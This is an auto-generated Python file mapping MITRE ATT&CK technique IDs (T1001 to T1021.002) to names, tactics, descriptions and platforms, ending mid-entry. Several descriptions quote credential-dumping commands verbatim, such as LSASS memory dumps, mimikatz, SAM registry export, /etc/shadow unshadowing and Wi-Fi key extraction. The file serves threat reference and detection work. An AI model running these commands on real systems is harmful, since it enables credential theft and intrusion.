# This file is generated using generate_attack_map.py script
# DO NOT EDIT! Re-run the script instead...
# Last ran: 2024-09-04 16:41:21.134829

attack_map = {
 'T1001': {'attack_id': 'T1001',
           'categories': ['command-and-control'],
           'description': 'Adversaries may obfuscate command and control traffic to make it more difficult to '
                          'detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) '
                          'communications are hidden (but not necessarily encrypted) in an attempt to make the content '
                          'more difficult to discover or decipher and to make the communication less conspicuous and '
                          'hide commands from being seen. This encompasses many methods, such as adding junk data to '
                          'protocol traffic, using steganography, or impersonating legitimate protocols. ',
           'name': 'Data Obfuscation',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1001.001': {'attack_id': 'T1001.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may add junk data to protocols used for command and control to make '
                              'detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding '
                              'random or meaningless data to the protocols used for command and control, adversaries '
                              'can prevent trivial methods for decoding, deciphering, or otherwise analyzing the '
                              'traffic. Examples may include appending/prepending data with junk characters or writing '
                              'junk characters between significant characters. ',
               'name': 'Junk Data',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1001.002': {'attack_id': 'T1001.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use steganographic techniques to hide command and control traffic to '
                              'make detection efforts more difficult. Steganographic techniques can be used to hide '
                              'data in digital messages that are transferred between systems. This hidden information '
                              'can be used for command and control of compromised systems. In some cases, the passing '
                              'of files embedded using steganography, such as image or document files, can be used for '
                              'command and control. ',
               'name': 'Steganography',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1001.003': {'attack_id': 'T1001.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may impersonate legitimate protocols or web service traffic to disguise '
                              'command and control activity and thwart analysis efforts. By impersonating legitimate '
                              'protocols or web services, adversaries can make their command and control traffic blend '
                              'in with legitimate network traffic.  \n'
                              '\n'
                              'Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent '
                              'traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to '
                              'make the traffic look like it is related with a trusted entity. ',
               'name': 'Protocol Impersonation',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1003': {'attack_id': 'T1003',
           'categories': ['credential-access'],
           'description': 'Adversaries may attempt to dump credentials to obtain account login and credential '
                          'material, normally in the form of a hash or a clear text password. Credentials can be '
                          'obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) '
                          'Credentials can then be used to perform [Lateral '
                          'Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.\n'
                          '\n'
                          'Several of the tools mentioned in associated sub-techniques may be used by both adversaries '
                          'and professional security testers. Additional custom tools likely exist as well.\n',
           'name': 'OS Credential Dumping',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1003.001': {'attack_id': 'T1003.001',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access credential material stored in the process memory of '
                              'the Local Security Authority Subsystem Service (LSASS). After a user logs on, the '
                              'system generates and stores a variety of credential materials in LSASS process memory. '
                              'These credential materials can be harvested by an administrative user or SYSTEM and '
                              'used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use '
                              'Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n'
                              '\n'
                              'As well as in-memory techniques, the LSASS process memory can be dumped from the target '
                              'host and analyzed on a local system.\n'
                              '\n'
                              'For example, on the target host use procdump:\n'
                              '\n'
                              '* <code>procdump -ma lsass.exe lsass_dump</code>\n'
                              '\n'
                              'Locally, mimikatz can be run using:\n'
                              '\n'
                              '* <code>sekurlsa::Minidump lsassdump.dmp</code>\n'
                              '* <code>sekurlsa::logonPasswords</code>\n'
                              '\n'
                              'Built-in Windows tools such as `comsvcs.dll` can also be used:\n'
                              '\n'
                              '* <code>rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID  lsass.dmp '
                              'full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks '
                              'Against Government Sector)\n'
                              '\n'
                              'Similar to [Image File Execution Options '
                              'Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit '
                              'mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error '
                              'Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n'
                              '\n'
                              'Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system '
                              'start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext '
                              "passwords that are stored in Windows, such as any logged-on user's Domain password or "
                              'smart card PINs. The SSP configuration is stored in two Registry keys: '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security '
                              'Packages</code>. An adversary may modify these Registry keys to add new SSPs, which '
                              'will be loaded the next time the system boots, or when the AddSecurityPackage Windows '
                              'API function is called.(Citation: Graeber 2014)\n'
                              '\n'
                              'The following SSPs can be used to access credentials:\n'
                              '\n'
                              '* Msv: Interactive logons, batch logons, and service logons are done through the MSV '
                              'authentication package.\n'
                              '* Wdigest: The Digest Authentication protocol is designed for use with Hypertext '
                              'Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) '
                              'exchanges.(Citation: TechNet Blogs Credential Protection)\n'
                              '* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 '
                              'and later.\n'
                              '* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop '
                              'Services.(Citation: TechNet Blogs Credential Protection)\n',
               'name': 'LSASS Memory',
               'platforms': ['Windows']},
 'T1003.002': {'attack_id': 'T1003.002',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to extract credential material from the Security Account '
                              'Manager (SAM) database either through in-memory techniques or through the Windows '
                              'Registry where the SAM database is stored. The SAM is a database file that contains '
                              'local accounts for the host, typically those found with the <code>net user</code> '
                              'command. Enumerating the SAM database requires SYSTEM level access.\n'
                              '\n'
                              'A number of tools can be used to retrieve the SAM file through in-memory techniques:\n'
                              '\n'
                              '* pwdumpx.exe\n'
                              '* [gsecdump](https://attack.mitre.org/software/S0008)\n'
                              '* [Mimikatz](https://attack.mitre.org/software/S0002)\n'
                              '* secretsdump.py\n'
                              '\n'
                              'Alternatively, the SAM can be extracted from the Registry with Reg:\n'
                              '\n'
                              '* <code>reg save HKLM\\sam sam</code>\n'
                              '* <code>reg save HKLM\\system system</code>\n'
                              '\n'
                              'Creddump7 can then be used to process the SAM database locally to retrieve '
                              'hashes.(Citation: GitHub Creddump7)\n'
                              '\n'
                              'Notes: \n'
                              '\n'
                              '* RID 500 account is the local, built-in administrator.\n'
                              '* RID 501 is the guest account.\n'
                              '* User accounts start with a RID of 1,000+.\n',
               'name': 'Security Account Manager',
               'platforms': ['Windows']},
 'T1003.003': {'attack_id': 'T1003.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access or create a copy of the Active Directory domain '
                              'database in order to steal credential information, as well as obtain other information '
                              'about domain members such as devices, users, and access rights. By default, the NTDS '
                              'file (NTDS.dit) is located in <code>%SystemRoot%\\NTDS\\Ntds.dit</code> of a domain '
                              'controller.(Citation: Wikipedia Active Directory)\n'
                              '\n'
                              'In addition to looking for NTDS files on active Domain Controllers, adversaries may '
                              'search for backups that contain the same or similar information.(Citation: Metcalf '
                              '2015)\n'
                              '\n'
                              'The following tools and techniques can be used to enumerate the NTDS file and the '
                              'contents of the entire Active Directory hashes.\n'
                              '\n'
                              '* Volume Shadow Copy\n'
                              '* secretsdump.py\n'
                              '* Using the in-built Windows tool, ntdsutil.exe\n'
                              '* Invoke-NinjaCopy\n',
               'name': 'NTDS',
               'platforms': ['Windows']},
 'T1003.004': {'attack_id': 'T1003.004',
               'categories': ['credential-access'],
               'description': 'Adversaries with SYSTEM access to a host may attempt to access Local Security Authority '
                              '(LSA) secrets, which can contain a variety of different credential materials, such as '
                              'credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft '
                              'AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in '
                              'the registry at <code>HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets</code>. LSA secrets '
                              'can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n'
                              '\n'
                              '[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the '
                              'Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract '
                              'secrets from memory.(Citation: ired Dumping LSA Secrets)',
               'name': 'LSA Secrets',
               'platforms': ['Windows']},
 'T1003.005': {'attack_id': 'T1003.005',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access cached domain credentials used to allow '
                              'authentication to occur in the event a domain controller is unavailable.(Citation: '
                              'Microsoft - Cached Creds)\n'
                              '\n'
                              'On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version '
                              '2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of '
                              'default cached credentials varies and can be altered per system. This hash does not '
                              'allow pass-the-hash style attacks, and instead requires [Password '
                              'Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext '
                              'password.(Citation: ired mscache)\n'
                              '\n'
                              'On Linux systems, Active Directory credentials can be accessed through caches '
                              'maintained by software like System Security Services Daemon (SSSD) or Quest '
                              'Authentication Services (formerly VAS). Cached credential hashes are typically located '
                              'at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or '
                              '`/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, '
                              'such as `tdbdump`, on these database files to dump the cached hashes and use [Password '
                              'Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext '
                              'password.(Citation: Brining MimiKatz to Unix) \n'
                              '\n'
                              'With SYSTEM or sudo access, the tools/utilities such as '
                              '[Mimikatz](https://attack.mitre.org/software/S0002), '
                              '[Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or '
                              'Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining '
                              'MimiKatz to Unix)\n'
                              '\n'
                              'Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib '
                              'mscache)',
               'name': 'Cached Domain Credentials',
               'platforms': ['Windows', 'Linux']},
 'T1003.006': {'attack_id': 'T1003.006',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access credentials and other sensitive information by '
                              "abusing a Windows Domain Controller's application programming interface (API)(Citation: "
                              'Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) '
                              '(Citation: Wine API samlib.dll) to simulate the replication process from a remote '
                              'domain controller using a technique called DCSync.\n'
                              '\n'
                              'Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer '
                              'accounts on the domain controller are able to run DCSync to pull password '
                              'data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include '
                              'current and historical hashes of potentially useful accounts such as KRBTGT and '
                              'Administrators. The hashes can then in turn be used to create a [Golden '
                              'Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the '
                              'Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and '
                              "DCSync) or change an account's password as noted in [Account "
                              'Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat '
                              'ChangeNTLM July 2017)\n'
                              '\n'
                              'DCSync functionality has been included in the "lsadump" module in '
                              '[Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump '
                              'Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication '
                              'protocol.(Citation: Microsoft NRPC Dec 2017)',
               'name': 'DCSync',
               'platforms': ['Windows']},
 'T1003.007': {'attack_id': 'T1003.007',
               'categories': ['credential-access'],
               'description': 'Adversaries may gather credentials from the proc filesystem or `/proc`. The proc '
                              'filesystem is a pseudo-filesystem used as an interface to kernel data structures for '
                              'Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` '
                              'file shows how memory is mapped within the process’s virtual address space. And '
                              '`/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s '
                              'virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux '
                              'proc map 2022)\n'
                              '\n'
                              'When executing with root privileges, adversaries can search these memory locations for '
                              'all processes on a system that contain patterns indicative of credentials. Adversaries '
                              'may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut '
                              "-d' ' -f 1</code>, to look for fixed strings in memory structures or cached "
                              'hashes.(Citation: atomic-red proc file system) When running without privileged access, '
                              'processes can still view their own virtual memory locations. Some services or programs '
                              'may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin '
                              'GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)\n'
                              '\n'
                              'If running as or with the permissions of a web browser, a process can search the '
                              '`/maps` & `/mem` locations for common website credential patterns (that can also be '
                              'used to find adjacent memory within the same structure) in which hashes or cleartext '
                              'credentials may be located.',
               'name': 'Proc Filesystem',
               'platforms': ['Linux']},
 'T1003.008': {'attack_id': 'T1003.008',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and '
                              '<code>/etc/shadow</code> to enable offline password cracking. Most modern Linux '
                              'operating systems use a combination of <code>/etc/passwd</code> and '
                              '<code>/etc/shadow</code> to store user account information including password hashes in '
                              '<code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the '
                              'root user.(Citation: Linux Password and Shadow File Formats)\n'
                              '\n'
                              'The Linux utility, unshadow, can be used to combine the two files in a format suited '
                              'for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the '
                              'Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > '
                              '/tmp/crack.password.db</code>\n',
               'name': '/etc/passwd and /etc/shadow',
               'platforms': ['Linux']},
 'T1005': {'attack_id': 'T1005',
           'categories': ['collection'],
           'description': 'Adversaries may search local system sources, such as file systems and configuration files '
                          'or local databases, to find files of interest and sensitive data prior to Exfiltration.\n'
                          '\n'
                          'Adversaries may do this using a [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059), such as '
                          '[cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device '
                          'CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact '
                          'with the file system to gather information.(Citation: show_run_config_cmd_cisco) '
                          'Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) '
                          'on the local system.\n',
           'name': 'Data from Local System',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1006': {'attack_id': 'T1006',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may directly access a volume to bypass file access controls and file system '
                          'monitoring. Windows allows programs to have direct access to logical volumes. Programs with '
                          'direct access may read and write files directly from the drive by analyzing file system '
                          'data structures. This technique may bypass Windows file access controls as well as file '
                          'system monitoring tools. (Citation: Hakobyan 2009)\n'
                          '\n'
                          'Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: '
                          'Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities '
                          '(such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to '
                          'create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)',
           'name': 'Direct Volume Access',
           'platforms': ['Windows', 'Network']},
 'T1007': {'attack_id': 'T1007',
           'categories': ['discovery'],
           'description': 'Adversaries may try to gather information about registered local system services. '
                          'Adversaries may obtain information about services using tools as well as OS utility '
                          'commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl '
                          '--type=service</code>, and <code>net start</code>.\n'
                          '\n'
                          'Adversaries may use the information from [System Service '
                          'Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions.',
           'name': 'System Service Discovery',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1008': {'attack_id': 'T1008',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use fallback or alternate communication channels if the primary channel is '
                          'compromised or inaccessible in order to maintain reliable command and control and to avoid '
                          'data transfer thresholds.',
           'name': 'Fallback Channels',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1010': {'attack_id': 'T1010',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of open application windows. Window listings could '
                          'convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) '
                          'For example, information about application windows could be used identify potential data to '
                          'collect as well as identifying security tooling ([Security Software '
                          'Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET '
                          'Grandoreiro April 2020)\n'
                          '\n'
                          'Adversaries typically abuse system features for this type of enumeration. For example, they '
                          'may gather information through native system features such as [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native '
                          'API](https://attack.mitre.org/techniques/T1106) functions.',
           'name': 'Application Window Discovery',
           'platforms': ['macOS', 'Windows', 'Linux']},
 'T1011': {'attack_id': 'T1011',
           'categories': ['exfiltration'],
           'description': 'Adversaries may attempt to exfiltrate data over a different network medium than the command '
                          'and control channel. If the command and control network is a wired Internet connection, the '
                          'exfiltration may occur, for example, over a WiFi connection, modem, cellular data '
                          'connection, Bluetooth, or another radio frequency (RF) channel.\n'
                          '\n'
                          'Adversaries may choose to do this if they have sufficient access or proximity, and the '
                          'connection might not be secured or defended as well as the primary Internet-connected '
                          'channel because it is not routed through the same enterprise network.',
           'name': 'Exfiltration Over Other Network Medium',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1011.001': {'attack_id': 'T1011.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and '
                              'control channel. If the command and control network is a wired Internet connection, an '
                              'adversary may opt to exfiltrate data using a Bluetooth communication channel.\n'
                              '\n'
                              'Adversaries may choose to do this if they have sufficient access and proximity. '
                              'Bluetooth connections might not be secured or defended as well as the primary '
                              'Internet-connected channel because it is not routed through the same enterprise '
                              'network.',
               'name': 'Exfiltration Over Bluetooth',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1012': {'attack_id': 'T1012',
           'categories': ['discovery'],
           'description': 'Adversaries may interact with the Windows Registry to gather information about the system, '
                          'configuration, and installed software.\n'
                          '\n'
                          'The Registry contains a significant amount of information about the operating system, '
                          'configuration, software, and security.(Citation: Wikipedia Windows Registry) Information '
                          'can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, '
                          'though other means to access the Registry exist. Some of the information may help '
                          'adversaries to further their operation within a network. Adversaries may use the '
                          'information from [Query Registry](https://attack.mitre.org/techniques/T1012) during '
                          'automated discovery to shape follow-on behaviors, including whether or not the adversary '
                          'fully infects the target and/or attempts specific actions.',
           'name': 'Query Registry',
           'platforms': ['Windows']},
 'T1014': {'attack_id': 'T1014',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use rootkits to hide the presence of programs, files, network connections, '
                          'services, drivers, and other system components. Rootkits are programs that hide the '
                          'existence of malware by intercepting/hooking and modifying operating system API calls that '
                          'supply system information. (Citation: Symantec Windows Rootkits) \n'
                          '\n'
                          'Rootkits or rootkit enabling functionality may reside at the user or kernel level in the '
                          'operating system or lower, to include a hypervisor, Master Boot Record, or [System '
                          'Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) '
                          'Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike '
                          'Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)',
           'name': 'Rootkit',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1016': {'attack_id': 'T1016',
           'categories': ['discovery'],
           'description': 'Adversaries may look for details about the network configuration and settings, such as IP '
                          'and/or MAC addresses, of systems they access or through information discovery of remote '
                          'systems. Several operating system administration utilities exist that can be used to gather '
                          'this information. Examples include [Arp](https://attack.mitre.org/software/S0099), '
                          '[ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), '
                          '[nbtstat](https://attack.mitre.org/software/S0102), and '
                          '[route](https://attack.mitre.org/software/S0103).\n'
                          '\n'
                          'Adversaries may also leverage a [Network Device '
                          'CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather '
                          'information about configurations and settings, such as IP addresses of configured '
                          'interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip '
                          'interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion '
                          ')\n'
                          '\n'
                          'Adversaries may use the information from [System Network Configuration '
                          'Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape '
                          'follow-on behaviors, including determining certain access within the target network and '
                          'what actions to do next. ',
           'name': 'System Network Configuration Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1016.001': {'attack_id': 'T1016.001',
               'categories': ['discovery'],
               'description': 'Adversaries may check for Internet connectivity on compromised systems. This may be '
                              'performed during automated discovery and can be accomplished in numerous ways such as '
                              'using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET '
                              'requests to websites.\n'
                              '\n'
                              'Adversaries may use the results and responses from these requests to determine if the '
                              'system is capable of communicating with their C2 servers before attempting to connect '
                              'to them. The results may also be used to identify routes, redirectors, and proxy '
                              'servers.',
               'name': 'Internet Connection Discovery',
               'platforms': ['Windows', 'Linux', 'macOS']},
 'T1016.002': {'attack_id': 'T1016.002',
               'categories': ['discovery'],
               'description': 'Adversaries may search for information about Wi-Fi networks, such as network names and '
                              'passwords, on compromised systems. Adversaries may use Wi-Fi information as part of '
                              '[Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System '
                              'Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or '
                              '[Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both '
                              'ongoing and future campaigns.\n'
                              '\n'
                              'Adversaries may collect various types of information about Wi-Fi networks from hosts. '
                              'For example, on Windows names and passwords of all Wi-Fi networks a device has '
                              'previously connected to may be available through `netsh wlan show profiles` to '
                              'enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show '
                              'a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal '
                              'wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi '
                              'credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names '
                              'and other details of locally reachable Wi-Fi networks can be discovered using calls to '
                              '`wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) '
                              'functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)\n'
                              '\n'
                              'On Linux, names and passwords of all Wi-Fi-networks a device has previously connected '
                              'to may be available in files under ` '
                              '/etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected '
                              'Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified '
                              'with ` security find-generic-password -wa wifiname` (requires admin '
                              'username/password).(Citation: Find Wi-Fi Password on Mac)\n',
               'name': 'Wi-Fi Discovery',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1018': {'attack_id': 'T1018',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of other systems by IP address, hostname, or other '
                          'logical identifier on a network that may be used for Lateral Movement from the current '
                          'system. Functionality could exist within remote access tools to enable this, but utilities '
                          'available on the operating system could also be used such as  '
                          '[Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using '
                          '[Net](https://attack.mitre.org/software/S0039).\n'
                          '\n'
                          'Adversaries may also analyze data from local host files (ex: '
                          '<code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) or '
                          'other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache '
                          'entries) in order to discover the presence of remote systems in an environment.\n'
                          '\n'
                          'Adversaries may also target discovery of network infrastructure as well as leverage '
                          '[Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network '
                          'devices to gather detailed information about systems within a network (e.g. <code>show cdp '
                          'neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA '
                          'AR21-126A FIVEHANDS May 2021)  \n',
           'name': 'Remote System Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1020': {'attack_id': 'T1020',
           'categories': ['exfiltration'],
           'description': 'Adversaries may exfiltrate data, such as sensitive documents, through the use of automated '
                          'processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) \n'
                          '\n'
                          'When automated exfiltration is used, other exfiltration techniques likely apply as well to '
                          'transfer the information out of the network, such as [Exfiltration Over C2 '
                          'Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative '
                          'Protocol](https://attack.mitre.org/techniques/T1048).',
           'name': 'Automated Exfiltration',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1020.001': {'attack_id': 'T1020.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may leverage traffic mirroring in order to automate data exfiltration over '
                              'compromised infrastructure. Traffic mirroring is a native feature for some devices, '
                              'often used for network analysis. For example, devices may be configured to forward '
                              'network traffic to one or more destinations for analysis by a network analyzer or other '
                              'monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic '
                              'Mirroring)\n'
                              '\n'
                              'Adversaries may abuse traffic mirroring to mirror or redirect network traffic through '
                              'other infrastructure they control. Malicious modifications to network devices to enable '
                              'traffic redirection may be possible through '
                              '[ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System '
                              'Image](https://attack.mitre.org/techniques/T1601/001).(Citation: '
                              'US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)\n'
                              '\n'
                              'Many cloud-based environments also support traffic mirroring. For example, AWS Traffic '
                              'Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified '
                              'instances to collect traffic from and specified targets to send collected traffic '
                              'to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure '
                              'Virtual Network TAP)\n'
                              '\n'
                              'Adversaries may use traffic duplication in conjunction with [Network '
                              'Sniffing](https://attack.mitre.org/techniques/T1040), [Input '
                              'Capture](https://attack.mitre.org/techniques/T1056), or '
                              '[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the '
                              'goals and objectives of the adversary.',
               'name': 'Traffic Duplication',
               'platforms': ['Network', 'IaaS']},
 'T1021': {'attack_id': 'T1021',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into '
                          'a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may '
                          'then perform actions as the logged-on user.\n'
                          '\n'
                          'In an enterprise environment, servers and workstations can be organized into domains. '
                          'Domains provide centralized identity management, allowing users to login using one set of '
                          'credentials across the entire network. If an adversary is able to obtain a set of valid '
                          'domain credentials, they could login to many different machines using remote access '
                          'protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure '
                          'Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS '
                          'or IaaS services, such as those that federate their identities to the domain. \n'
                          '\n'
                          'Legitimate applications (such as [Software Deployment '
                          'Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may '
                          'utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote '
                          'hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote '
                          'management. ARD leverages a blend of protocols, including '
                          '[VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers '
                          'and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file '
                          'transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop '
                          'commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse '
                          'applications such as ARD to gain remote code execution and perform lateral movement. In '
                          'versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD '
                          'session which enables an adversary to accept TCC (Transparency, Consent, and Control) '
                          'prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple '
                          'Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop '
                          'commands)',
           'name': 'Remote Services',
           'platforms': ['Linux', 'macOS', 'Windows', 'IaaS']},
 'T1021.001': {'attack_id': 'T1021.001',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log '
                              'into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform '
                              'actions as the logged-on user.\n'
                              '\n'
                              'Remote desktop is a common feature in operating systems. It allows a user to log into '
                              'an interactive session with a system desktop graphical user interface on a remote '
                              'system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as '
                              'Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n'
                              '\n'
                              'Adversaries may connect to a remote system over RDP/RDS to expand access if the service '
                              'is enabled and allows access to accounts with known credentials. Adversaries will '
                              'likely use Credential Access techniques to acquire credentials to use with RDP. '
                              'Adversaries may also use RDP in conjunction with the [Accessibility '
                              'Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services '
                              'DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: '
                              'Alperovitch Malware)',
               'name': 'Remote Desktop Protocol',
               'platforms': ['Windows']},
 'T1021.002': {'attack_id': 'T1021.002',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'interact with a remote network share using Server Message Block (SMB). The adversary '
                              'may then perform actions as the logged-on user.\n'
                              '\n'
                              'SMB is a file, printer, and serial port sharing protocol for Windows machines on the '
                              'same network or domain. Adversaries may use SMB to interact with file shares, allowing '
